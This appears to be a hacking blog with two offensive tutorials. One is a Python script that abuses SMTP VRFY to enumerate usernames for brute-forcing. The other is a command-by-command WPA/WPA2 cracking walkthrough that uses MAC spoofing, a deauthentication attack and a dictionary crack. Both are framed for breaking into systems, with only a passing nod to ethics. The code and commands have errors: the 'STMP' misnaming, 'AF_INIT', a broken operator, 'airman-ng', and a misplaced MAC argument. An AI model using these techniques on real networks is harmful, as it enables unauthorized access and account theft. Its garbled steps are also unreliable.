Enumerate Windows Users with STMP

Enumerating Window Usernames remotely is always fun. If you want to break into a system fast, see if STMP is running. Most admins run STMP on their servers.

Here is a simple script that will make this task easy.


import socket

import sys

if len(sys.argv) ! = 2:

print “usage: <username>”


s = socket.socket(socket.AF_INIT, socket.SOCK_STREAM)

connect = s.connect ((‘IPADRESS’,25))

banner = s.recv(1024)

print banner

s.send (‘VRFY ‘ + sys.argv [1] + ‘\r\n’)

result = s.recv(1024)

print result



Now all you have to do is run this with a simple bash script to brute force usernames.

Crack WPA/WPA2 with BT4

Please be ethical with knowledge

Cracking Wireless is fun. Its like a slap in the face to everyone who thinks wireless is safe. Hiding your SSID, MAC Filtering, and other tweaks will not keep you safe.

# ifconfig –a

find your WLAN if

# airman-ng stop <Wireless if>

# ifconfig <Wireless if> down

# macchanger mac <mac to use in the xx:xx:xx:xx:xx:xx form>

We change our MAC to hide our identity and if we want to bypass MAC filtering

# airodump-ng <wireless if>

This will discover APs in the area. Its a really neat powerful tool, play with it a little.

# airodump-ng –channel <channel> –w <file> –bssid <ssid in the form of XX:XX:XX:XX:XX:XX> <wireless if>

This will capture packets to a file you specify for a specific ssid on a specific channel

In a new shell…

aireplay-ng –0 10 –a <AP MAC> –c <AP MAC> <wireless if>

Wait for the ACK packets. This will only work if there are active hosts on the AP.

Now crack the dump with a brute force attack

aircrack-ng <file> –w <dict file>

If you need a dict file there is an existing one in /pentest/wireless/cowpatty/dict